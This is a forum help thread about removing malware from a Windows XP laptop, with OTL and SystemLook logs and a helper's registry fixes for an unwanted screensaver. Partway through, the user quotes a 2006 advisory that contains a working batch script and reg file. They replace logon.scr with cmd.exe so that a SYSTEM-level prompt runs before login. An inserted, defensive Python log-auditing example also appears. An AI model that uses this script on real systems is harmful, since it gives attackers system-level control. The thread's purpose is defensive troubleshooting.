TechSpot

PC Performance Analysis and Stability Malware / registry repairs?

Solved
By LaptopWrecked
Jun 10, 2011
Topic Status:
Not open for further replies.
  1. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Here is the OTL log

    All processes killed
    ========== OTL ==========
    ========== SERVICES/DRIVERS ==========
    ========== REGISTRY ==========
    ========== FILES ==========
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\RegistryGenius_Setup.exe moved successfully.
    C:\Program Files\Common Files\Wise Installation Wizard\WIS6A615007721D4063B226EA41EB6604B9_9_0_3_3.MSI moved successfully.
    ========== COMMANDS ==========

    [EMPTYTEMP]

    User: Administrator
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: All Users

    User: Default User
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Java cache emptied: 0 bytes
    ->FireFox cache emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->FireFox cache emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V.000
    ->Temp folder emptied: 856938 bytes
    ->Temporary Internet Files folder emptied: 33170 bytes
    ->Java cache emptied: 0 bytes
    ->FireFox cache emptied: 63362207 bytes
    ->Flash cache emptied: 853 bytes

    User: Guest
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: LocalService
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes

    User: NetworkService
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 33223 bytes

    User: xxxxxxxxxxx

    %systemdrive% .tmp files removed: 0 bytes
    %systemroot% .tmp files removed: 0 bytes
    %systemroot%\System32 .tmp files removed: 0 bytes
    %systemroot%\System32\dllcache .tmp files removed: 0 bytes
    %systemroot%\System32\drivers .tmp files removed: 0 bytes
    Windows Temp folder emptied: 483 bytes
    %systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
    %systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
    RecycleBin emptied: 0 bytes

    Total Files Cleaned = 61.00 mb


    [EMPTYFLASH]

    User: Administrator
    ->Flash cache emptied: 0 bytes

    User: All Users

    User: Default User
    ->Flash cache emptied: 0 bytes

    User: fix
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V.000
    ->Flash cache emptied: 0 bytes

    User: Guest
    ->Flash cache emptied: 0 bytes

    User: LocalService

    User: NetworkService

    User: xxxxxxxxxx

    Total Flash Files Cleaned = 0.00 mb


    OTL by OldTimer - Version 3.2.24.0 log created on 06182011_165037

    Files\Folders moved on Reboot...

    Registry entries deleted on Reboot...
     
  2. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    One remaining problem?

    Whatever program is making the "mystify" screensaver launch is still active, I think. Is there any specific way to check that or to know how dangerous it may be?

    Should I run the OTL cleanup?
     
  3. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Hold on with the cleanup...

    Please download SystemLook from one of the links below and save it to your Desktop.
    Download Mirror #1
    Download Mirror #2

    64-bit users go HERE
    • Double-click SystemLook.exe to run it.
    • Vista\Win 7 users: Right click on SystemLook.exe, click Run As Administrator
    • Copy the content of the following box into the main textfield:
      Code:
      :filefind
      *.scr
      :reg
      HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel
      HKEY_USERS\.DEFAULT\Control Panel\Desktop
      
    • Click the Look button to start the scan.
    • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
    Note: The log can also be found on your Desktop entitled SystemLook.txt
     
  4. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    SystemLook 04.09.10 by jpshortstuff
    Log created at 17:57 on 18/06/2011 by fix
    Administrator - Elevation successful

    ========== filefind ==========

    Searching for "*.scr"
    C:\Documents and Settings\All Users\Documents\rkill.scr --a---- 1007108 bytes [05:18 03/06/2011] [05:28 03/06/2011] F206C61003B5F9E32A870CA9C6505963
    C:\Documents and Settings\fix.ASUS-P1-W3V\My Documents\Downloads\dds.scr -r----- 607222 bytes [05:48 10/06/2011] [05:48 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\dds.scr -r----- 607222 bytes [17:40 10/06/2011] [17:40 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\rkill.scr --a---- 1007120 bytes [06:32 12/06/2011] [06:32 12/06/2011] 62B8E10334799A27218FBE57708A9FC1
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\My Documents\Downloads\dds.scr --a---- 607222 bytes [17:33 10/06/2011] [17:33 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Program Files\SDHelper (Spybot - Search & Destroy)\STQSEYVRYIKRNYNY.scr -rahs-- 1562960 bytes [08:31 16/06/2011] [21:25 15/09/2008] 35F73F1936BDE91F1B6995510A61E7A8
    C:\Program Files\Spybot - Search & Destroy\GTLCSEUDCSDJNF.scr -rahs-- 1740632 bytes [08:49 16/06/2011] [22:31 26/01/2009] 7C616AD7AE8F75278A069641ECFCDC06
    C:\Program Files\Spybot - Search & Destroy\KFRRJMFAONNJVHGPGV.scr --a---- 4393096 bytes [08:49 16/06/2011] [06:04 31/05/2005] 09CA174A605B480318731E691DC98539
    C:\Program Files\Spybot - Search & Destroy\YVGXLHHZOXWJ.scr -rahs-- 2144088 bytes [08:49 16/06/2011] [22:31 26/01/2009] 896A1DB9A972AD2339C2E8569EC926D1
    C:\Program Files\TeaTimer (Spybot - Search & Destroy)\XXIXEEZJBUKYWHXIH.scr -rahs-- 2260480 bytes [08:31 16/06/2011] [23:07 05/03/2009] 390679F7A217A5E73D756276C40AE887
    C:\WINDOWS\$NtServicePackUninstall$\logon.scr -----c- 220672 bytes [21:24 09/11/2008] [12:00 04/08/2004] 43FCEEF75FD6208925DDD4FFF8C36723
    C:\WINDOWS\$NtServicePackUninstall$\scrnsave.scr -----c- 9216 bytes [21:24 09/11/2008] [12:00 04/08/2004] BDFA8CF643506ECFAA89AA60250C4C08
    C:\WINDOWS\$NtServicePackUninstall$\ss3dfo.scr -----c- 704512 bytes [21:24 09/11/2008] [12:00 04/08/2004] F7A268DC8F94B4404ADF6C648BF54289
    C:\WINDOWS\$NtServicePackUninstall$\ssbezier.scr -----c- 19968 bytes [21:24 09/11/2008] [12:00 04/08/2004] 7309359BBE66C6CE4CD733B8F8F02953
    C:\WINDOWS\$NtServicePackUninstall$\ssflwbox.scr -----c- 393216 bytes [21:24 09/11/2008] [12:00 04/08/2004] 72A5555729E786566823E6BB4ACD6FBD
    C:\WINDOWS\$NtServicePackUninstall$\ssmarque.scr -----c- 20992 bytes [21:24 09/11/2008] [12:00 04/08/2004] 16869817BEE71AED4003B2C380B1FD44
    C:\WINDOWS\$NtServicePackUninstall$\ssmypics.scr -----c- 47104 bytes [21:24 09/11/2008] [12:00 04/08/2004] 931B08F87AC66DA54FD5A0D8F73F5F34
    C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
    C:\WINDOWS\$NtServicePackUninstall$\sspipes.scr -----c- 610304 bytes [21:24 09/11/2008] [12:00 04/08/2004] F6D28802AA6423D84F918AB202FA0584
    C:\WINDOWS\$NtServicePackUninstall$\ssstars.scr -----c- 14336 bytes [21:24 09/11/2008] [12:00 04/08/2004] B7D61243AB22F27D059030499EC791F5
    C:\WINDOWS\$NtServicePackUninstall$\sstext3d.scr -----c- 679936 bytes [21:24 09/11/2008] [12:00 04/08/2004] 5AB7A4EBBEA9B44C112FE99BC099837D
    C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
    C:\WINDOWS\ServicePackFiles\i386\scrnsave.scr ------- 9216 bytes [00:12 14/04/2008] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
    C:\WINDOWS\ServicePackFiles\i386\ss3dfo.scr ------- 704512 bytes [00:12 14/04/2008] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
    C:\WINDOWS\ServicePackFiles\i386\ssbezier.scr ------- 19968 bytes [00:12 14/04/2008] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
    C:\WINDOWS\ServicePackFiles\i386\ssflwbox.scr ------- 393216 bytes [00:12 14/04/2008] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
    C:\WINDOWS\ServicePackFiles\i386\ssmarque.scr ------- 20992 bytes [00:12 14/04/2008] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
    C:\WINDOWS\ServicePackFiles\i386\ssmypics.scr ------- 47104 bytes [00:12 14/04/2008] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
    C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
    C:\WINDOWS\ServicePackFiles\i386\sspipes.scr ------- 610304 bytes [00:12 14/04/2008] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
    C:\WINDOWS\ServicePackFiles\i386\ssstars.scr ------- 14336 bytes [00:12 14/04/2008] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
    C:\WINDOWS\ServicePackFiles\i386\sstext3d.scr ------- 679936 bytes [00:12 14/04/2008] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1
    C:\WINDOWS\system32\7E7 Screensaver.scr --a---- 7732880 bytes [07:13 11/09/2006] [07:13 11/09/2006] C9B1EF9ED9E404EBAD2E539A2F7E979E
    C:\WINDOWS\system32\Boeing 747-8.scr --a---- 2947372 bytes [19:26 16/02/2006] [19:26 16/02/2006] 2AF2CC23586C2DA2B4D6181A969064F0
    C:\WINDOWS\system32\logon.scr --a---- 220672 bytes [12:00 04/08/2004] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
    C:\WINDOWS\system32\scrnsave.scr --a---- 9216 bytes [12:00 04/08/2004] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
    C:\WINDOWS\system32\ss3dfo.scr --a---- 704512 bytes [12:00 04/08/2004] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
    C:\WINDOWS\system32\ssbezier.scr --a---- 19968 bytes [12:00 04/08/2004] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
    C:\WINDOWS\system32\ssflwbox.scr --a---- 393216 bytes [12:00 04/08/2004] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
    C:\WINDOWS\system32\ssmarque.scr --a---- 20992 bytes [12:00 04/08/2004] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
    C:\WINDOWS\system32\ssmypics.scr --a---- 47104 bytes [12:00 04/08/2004] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
    C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
    C:\WINDOWS\system32\sspipes.scr --a---- 610304 bytes [12:00 04/08/2004] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
    C:\WINDOWS\system32\ssstars.scr --a---- 14336 bytes [12:00 04/08/2004] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
    C:\WINDOWS\system32\sstext3d.scr --a---- 679936 bytes [12:00 04/08/2004] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1

    ========== reg ==========

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel]
    (Unable to open key - key not found)

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]
     
  5. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Give me some more details about that "mystify" screensaver.
    When exactly can you see it, why do you call it "mystify" and whatever else you can give me...
     
  6. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I call it "mystify" because that's its name in the screensaver choices under display settings in control panel.

    Well, I have a Spybot dialogue box popping up every once in a while telling me a warning that the system is trying to change a registry value with file names that look like they belong to the "mystify" screensaver (it is the one that is a bunch of triangles that bounce around on a black background). I have NEVER chosen to run that screensaver on my computer. If I fail to stop it, it sets itself to activate at 1 minute of inactivity. Sometimes it doesn't show up, sometimes it does.

    Anyway, in the Spybot dialogue box I can choose to allow or deny the registry change, so every time it's popped up I have denied it. But I think once it ran even though I denied it in the Spybot box.

    Are any of these relevant files?

    C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

    C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

    C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
     
  7. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.
     
  8. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I just don't know why it has launched itself at a 1 minute start time when I have not selected any screensaver to run at all.

    That is not normal, correct?
     
  9. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Double check screensaver settings. Something must be allowing it to run.

    Then continue with OTL cleanup and other steps.
     
  10. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Upon computer start up/ loading windows my Spybot program caught it again.

    Here is the text from the Spybot dialogue window:

    Registry change alert
    Category: Desktop Settings
    Change: Value Added
    Entry: scrnsave.exe
    New Data: C:WINDOWS\system32\ssmyst.scr

    I then deny the change. I also looked for ssmyst.scr in the path shown above, but I don't see it in the tree.
     
  11. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Why are you denying it?
    It's a legit Windows file.
     
     
  12. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I just don't understand why it's launching itself without my asking for it to run.
     
  13. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Double check screensaver settings.
     
  14. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I have "none" selected in control panel.

    When this thing launches it runs the "mystify" screensaver at a 1 minute time selection. Without me asking for it.
     
  15. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Launch Notepad and paste the following four lines. (Note: The second line must be blank.)

    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Control Panel\Desktop]
    "ScreenSaveActive"="0"
    
    Save the file to your desktop with the name Disable ScreenSaver.reg.

    Right click on the above file, click "Merge".

    Restart computer.

    Re-run System Look with the following code:

    Code:
    :reg
    HKEY_USERS\.DEFAULT\Control Panel\Desktop
    
    Post the log.
     
  16. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    SystemLook 04.09.10 by jpshortstuff
    Log created at 15:41 on 19/06/2011 by fix
    Administrator - Elevation successful

    ========== reg ==========

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]
    "ActiveWndTrkTimeout"= 0x0000000000 (0)
    "AutoEndTasks"="0"
    "CaretWidth"= 0x0000000001 (1)
    "CoolSwitch"="1"
    "CoolSwitchColumns"="7"
    "CoolSwitchRows"="3"
    "CursorBlinkRate"="530"
    "DragFullWindows"="2"
    "DragHeight"="4"
    "DragWidth"="4"
    "FontSmoothing"="2"
    "FontSmoothingOrientation"= 0x0000000001 (1)
    "FontSmoothingType"= 0x0000000001 (1)
    "ForegroundFlashCount"= 0x0000000003 (3)
    "ForegroundLockTimeout"= 0x0000030d40 (200000)
    "GridGranularity"="0"
    "HungAppTimeout"="5000"
    "LowPowerActive"="0"
    "LowPowerTimeOut"="0"
    "MenuShowDelay"="400"
    "PaintDesktopVersion"= 0x0000000000 (0)
    "Pattern"="(None)"
    "PowerOffActive"="0"
    "PowerOffTimeOut"="0"
    "ScreenSaverIsSecure"="0"
    "ScreenSaveTimeOut"="600"
    "ScreenSaveActive"="1"
    "SCRNSAVE.EXE"="logon.scr"
    "TileWallpaper"="0"
    "UserPreferencesMask"=9e 3e 03 80 (REG_BINARY)
    "WaitToKillAppTimeout"="20000"
    "Wallpaper"="(None)"
    "WallpaperStyle"="2"
    "OriginalWallpaper"=""
    "WheelScrollLines"="3"

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop\WindowMetrics]


    -= EOF =-




    Have to go to work now. Thanks for all the assistance. Back about 9pm pacific time.
     
  17. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Found Screensaver Vulnerability Post on another site

    Does this look like what may be going on with my system?


    -- Advisory Name --

    Default Screen Saver Vulnerability in Microsoft Windows

    -- Author --

    Susam Pal

    -- Vulnerable Systems --

    Windows XP, Windows 2003 Server

    -- Vulnerability Description --

    This vulnerability has been tested on Windows XP and Windows 2003 Server. The screen saver in these systems is allowed to run even when a user hasn't logged in. To verify this one has to start windows and wait for the default screen saver to appear without logging in. The screen saver should appear after 10 minutes because that is the default value of screen saver time-out.

    Since no user logs in, this screen saver runs as a system process. The registry entries for this screen saver running as a system process can be found in the registry-key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are the default values.

    Windows Registry Editor Version 5.00

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]

    "ScreenSaverIsSecure"="0"

    "ScreenSaveTimeOut"="600"

    "ScreenSaveActive"="1"

    "SCRNSAVE.EXE"="logon.scr"

    It can be seen that the default time-out value is 600 seconds or 10 minutes.

    An attacker can replace the default screen saver (logon.scr) with the command prompt (cmd.exe) and reduce the time-out period in a system by using a trojan or some other means. Later, the attacker can boot the system and wait for the screen saver to appear which is now the command prompt. Since the command prompt now runs as a system process, the attacker can perform critical operations including malicious ones. He may even execute "explorer.exe" to bring up the Windows GUI along with the desktop, start button, etc.

    -- Exploit Reg File --

    Windows Registry Editor Version 5.00

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]

    "ScreenSaverIsSecure"="0"

    "ScreenSaveTimeOut"="60"

    "ScreenSaveActive"="1"

    "SCRNSAVE.EXE"="logon.scr"

    -- Exploit Script --

    @echo off

    rem ---------------------------------------------------------------------------

    rem FileName: DSSExploit.bat

    rem Description: This script replaces the default windows screensaver

    rem with command prompt and configures the registry for

    rem attack

    rem Author: Susam Pal

    rem Date: 19th May, 2006

    rem ---------------------------------------------------------------------------

    rem kill logon.scr if its running

    tasklist | find /i "logon.scr"

    if %errorlevel% == 1 goto replace

    taskkill /f /im "logon.scr"

    :replace

    rem replace

    rename %SystemRoot%\System32\logon.scr logon.scr.bak

    copy %ComSpec% %SystemRoot%\System32\logon.scr

    rem update the registry keys for default screen saver

    set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"

    reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1

    reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0

    reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60

    reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

    -- Prevention --

    One of the following preventive measures should be taken.

    1. The users of the system should not run any program, script or software obtained from unreliable source as an administrator or any user which has the permission to modify the Windows Registry.

    2. Disable screen saver by executing the following command.

    reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /f /d 0

    Deny everyone all permissions on the registry key, "My Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any malicious program, script or software from modifying the default screen saver settings. This can be done by the following steps.

    a. Run "regedit.exe".

    b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

    c. Right click on the key and select "Permissions".

    d. Press "Add" button.

    e. Press "Locations" button.

    f. If a login window appears, click "Cancel" button.

    g. Select the local computer and press "Ok" button.

    h. Enter "Everyone" in the text-area for object names and press "Ok" button.

    i. Deny "Full Control" permission for "Everyone" and press "Ok" button.

    3. Microsoft should release a patch which prevents the screen saver from running before a user logs in with proper authentication.

    -- Disclaimer --

    The information, codes and exploits in this advisory should be used for research, experimentation, bug-fixes and patch-releases only. The author shall not be liable in any event of any damages, incidental or consequential, in connection with, or arising out of this advisory.

    -- Contact Information --

    For more information, please contact:-

    Susam Pal

    Infosys Technologies Ltd.

    Survey No. 210, Manikonda Village

    Lingampally, Rangareddy District

    Hyderabad, PIN 500019

    India

    Phone No.: +91-9985259521

    Email: susam.pal (at) gmail (dot) com

    http://susampal.blogspot.com/

    http://securecoding.blogspot.com/
     
  18. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Go Start>Run, type in:
    regedit
    Click OK.

    In Registry Editor, navigate to:
    HKEY_USERS\.DEFAULT\Control Panel\Desktop
    In right pane, right click on ScreenSaveActive, click Modify.
    Change the value from 1 to 0 (zero).

    Restart computer.
    Will screensaver stay off?
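
Added example, not part of any post in this thread and not SystemLook's own code: a Python check that reads the `reg` section of a SystemLook log, in the layout posted above, and reports whether the pre-logon screen saver under `HKEY_USERS\.DEFAULT\Control Panel\Desktop` is enabled and whether its values differ from the defaults listed in the quoted advisory. The function names are hypothetical, `POSTED_LOG` is an excerpt of the log posted earlier, and `CHANGED_LOG` and `FIXED_LOG` are constructed samples.

```python
import re

# Key the advisory quoted in this thread names for the pre-logon screen saver.
LOGON_KEY = r"HKEY_USERS\.DEFAULT\Control Panel\Desktop"
# Defaults the advisory lists for Windows XP / Server 2003.
DEFAULT_SAVER, DEFAULT_TIMEOUT = "logon.scr", 600

def parse_reg_section(log_text):
    """Parse a SystemLook reg section into {key: {value_name_lower: data}}."""
    keys, current = {}, None
    for raw in log_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
            continue
        m = re.fullmatch(r'"([^"]*)"=\s*(.*)', line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = data[1:-1]          # REG_SZ data is shown quoted
            current[name.lower()] = data   # value names are case-insensitive
    return keys

def audit_logon_screensaver(log_text):
    """Return (enabled, deviations) for the pre-logon screen saver settings."""
    values = parse_reg_section(log_text).get(LOGON_KEY)
    if values is None:
        raise ValueError("log has no section for " + LOGON_KEY)
    enabled = values.get("screensaveactive") == "1"
    deviations = []
    saver = values.get("scrnsave.exe", "")
    # Compare only the file name, so a full path to the default still matches.
    if saver and saver.replace("/", "\\").split("\\")[-1].lower() != DEFAULT_SAVER:
        deviations.append("SCRNSAVE.EXE is %r, default is %r" % (saver, DEFAULT_SAVER))
    timeout = values.get("screensavetimeout", "")
    if timeout.isdigit() and int(timeout) < DEFAULT_TIMEOUT:
        deviations.append("ScreenSaveTimeOut lowered to %s s (default %d s)"
                          % (timeout, DEFAULT_TIMEOUT))
    return enabled, deviations

# Excerpt of the SystemLook log posted in this thread.
POSTED_LOG = r'''
========== reg ==========

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"CaretWidth"= 0x0000000001 (1)
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop\WindowMetrics]
'''
# Constructed samples (not from the thread): altered values, then disabled.
CHANGED_LOG = POSTED_LOG.replace('"600"', '"60"').replace(
    '"logon.scr"', r'"C:\WINDOWS\system32\ssmyst.scr"')
FIXED_LOG = POSTED_LOG.replace('"ScreenSaveActive"="1"', '"ScreenSaveActive"="0"')

if __name__ == "__main__":
    for name, log in [("posted", POSTED_LOG), ("changed", CHANGED_LOG),
                      ("fixed", FIXED_LOG)]:
        print(name, audit_logon_screensaver(log))
```

This looks only at the registry values. The advisory's scenario keeps the name logon.scr and swaps the file, so the file itself also needs comparing against a known-good copy, for example by the MD5 column in the SystemLook filefind output.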
     
  19. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I did the edit. I will post results.
     
  20. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Still with me?
     
  21. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Still with you.

    Everything seems OK. Just odds and ends from fixing the registry like some programs that had desktop shortcuts (Excel, Word) were gone, calc.exe file disappeared from windows accessories. I guess those things are set up a certain way at windows installation and they reverted to a new install default.

    Screen saver not launching any longer. All appears OK for now. Thanks for the help.
     
  22. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    You're very welcome
     